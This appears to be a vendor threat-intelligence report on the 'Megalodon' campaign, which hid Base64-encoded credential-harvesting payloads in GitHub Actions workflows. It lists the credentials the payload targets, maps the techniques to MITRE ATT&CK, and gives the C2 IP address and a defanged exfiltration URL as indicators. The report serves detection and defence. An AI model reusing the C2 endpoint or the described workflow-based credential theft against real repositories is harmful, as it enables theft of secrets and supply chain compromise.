The Reveal Platform
A large-scale software supply chain campaign dubbed Megalodon leveraged malicious GitHub Actions workflow modifications to steal sensitive credentials from affected repositories. Analysis revealed credential harvesting capabilities targeting GitHub tokens, cloud credentials, API keys, database secrets, and private keys.
The attack abused trusted CI/CD workflows by embedding obfuscated payloads that executed during automated build processes. Investigation uncovered evidence of external command-and-control (C2) communication and large-scale distribution of similar malicious payloads across thousands of GitHub repositories, highlighting the growing risk posed by CI/CD pipeline compromises within the open-source ecosystem.
Organizations relying on GitHub Actions and automated software delivery pipelines should carefully review workflow changes, monitor credential exposure, and strengthen repository security controls to mitigate similar threats.
| Category | Details |
| Threat Name | Megalodon |
| Attack Type | Software Supply Chain Attack |
| Initial Access | Malicious GitHub Workflow Modification |
| Primary Objective | Credential Theft |
| Targeted Assets | GitHub Tokens, AWS Credentials, API Keys, Database Secrets, SSH Keys |
| Potential Impact | Repository Takeover, CI/CD Compromise, Cloud Account Access, Supply Chain Risk |
The investigation began after identifying suspicious modifications within GitHub Actions workflow files associated with the Tiledesk-server repository, specifically version v2.18.12.
The workflow modifications appeared unusual compared to previous commits and raised concerns regarding the introduction of unauthorized code execution within the CI/CD process. Identifying the affected version was critical for tracing the origin of the malicious activity and understanding the potential impact on developers and downstream users.
Figure 1: Repository view of the Tiledesk-server project showing version v2.18.12 used in the investigation.
The campaign gained public attention after researchers reported a suspicious commit and unusual GitHub Actions workflow modifications through a GitHub issue.
Initial findings suggested that the modified workflow executed an encoded payload capable of collecting sensitive information from repository environments. The public disclosure triggered further investigation into the workflow contents and the broader scope of the campaign.
Figure 2: GitHub issue reporting a potentially malicious commit and suspicious GitHub Actions workflow modifications.
The technical investigation focused on understanding how the malicious workflow operated, how payloads were executed, the credential harvesting mechanisms employed, and the broader impact across affected repositories.
Analysis revealed modifications within GitHub Actions workflow files designed to execute attacker-controlled commands during automated build and deployment processes.
GitHub Actions runners often have access to sensitive repository secrets, cloud credentials, deployment tokens, and environment variables. By inserting malicious logic into trusted workflows, attackers can execute code within privileged environments and collect valuable credentials without requiring direct access to target systems.
This technique demonstrates the increasing attractiveness of CI/CD pipelines as a target for supply chain attacks.
During workflow review, investigators identified a suspicious Base64-encoded payload embedded within the execution commands.
Encoding techniques are frequently used by threat actors to conceal malicious functionality and evade detection during routine code reviews. Decoding the payload revealed additional scripts responsible for environment enumeration, credential collection, and external communications.
Figure 3: Suspicious Base64-encoded payload identified in the GitHub Actions workflow file during the initial analysis.
Further analysis of the decoded payload uncovered communication with attacker-controlled infrastructure.
The script attempted to establish outbound connections to an external server hosted at:
IP Address: 216.126.225.129
The communication contained identifiers likely used to track compromised repositories and associate stolen credentials with specific victims.
The presence of dedicated C2 infrastructure suggests a structured campaign focused on centralized collection and management of harvested data.
Figure 4: Decoded payload showing possible command-and-control (C2) server information and additional encoded content used during the attack process.
The decoded payload contained logic specifically designed to locate and extract sensitive credentials from CI/CD environments.
Targeted credentials included:
| Credential Type | Examples |
| GitHub Secrets | GITHUB_TOKEN |
| AWS Credentials | AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY |
| Cloud Tokens | Azure and GCP Authentication Tokens |
| Database Secrets | MySQL, PostgreSQL Connection Credentials |
| Private Keys | SSH Keys and PEM Files |
| API Keys | Third-Party Service Tokens |
This behavior strongly indicates that credential theft was the primary objective of the campaign.
Compromised credentials could subsequently be used for unauthorized repository access, cloud environment compromise, lateral movement, and additional supply chain attacks.
Figure 5: Credential harvesting patterns identified in the payload targeting sensitive information.
Investigation revealed that the malicious payload was not isolated to a single repository.
GitHub-wide searches identified approximately 2,800 files containing similar malicious payload patterns, suggesting widespread distribution of the attack across multiple repositories.
The repeated presence of identical workflow modifications indicates a coordinated campaign targeting multiple repositories.
Figure 6: GitHub search results showing approximately 2.8K files containing similar payload patterns across multiple repositories.
Based on the analysis of the malicious workflow, encoded payloads, and credential harvesting activity, several techniques from the MITRE ATT&CK framework were identified. These techniques help explain the attacker behavior and methods used during the campaign.
| Tactic | Technique | ID | Description |
| Initial Access | Supply Chain Compromise | T1195 | Attackers inserted malicious code into repositories |
| Execution | Command and Scripting Interpreter | T1059 | Malicious scripts executed through workflows |
| Defense Evasion | Obfuscated Files or Information | T1027 | Base64 encoding used to hide payload |
| Credential Access | Unsecured Credentials | T1552 | Credentials and secrets collected |
| Discovery | File and Directory Discovery | T1083 | Payload searched files and environment variables |
| Command and Control | Application Layer Protocol | T1071 | Communication with external server |
| Exfiltration | Exfiltration Over Web Service | T1567 | Data sent to attacker-controlled server |
IP Address : 216.126.225.129
URL : hXXp[:]//216[.]126[.]225[.]129[:]8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx
Gurucul SIEM can assist in identifying Megalodon-style supply chain attacks through:
Successful exploitation may result in:
| Risk | Description |
| Credential Theft | Exposure of sensitive tokens and secrets |
| Source Code Exposure | Unauthorized repository access |
| Cloud Compromise | Access to cloud infrastructure |
| CI/CD Compromise | Manipulation of build and deployment pipelines |
| Lateral Movement | Use of stolen credentials across environments |
| Supply Chain Impact | Propagation to downstream users and projects |
The Megalodon campaign demonstrates how threat actors increasingly target CI/CD environments and software supply chains to obtain high-value credentials at scale.
By abusing trusted GitHub Actions workflows and embedding obfuscated payloads within automated processes, attackers can compromise repositories while remaining difficult to detect through routine code reviews.
As software supply chain attacks continue to evolve, continuous monitoring of CI/CD environments has become a critical component of modern cybersecurity programs.
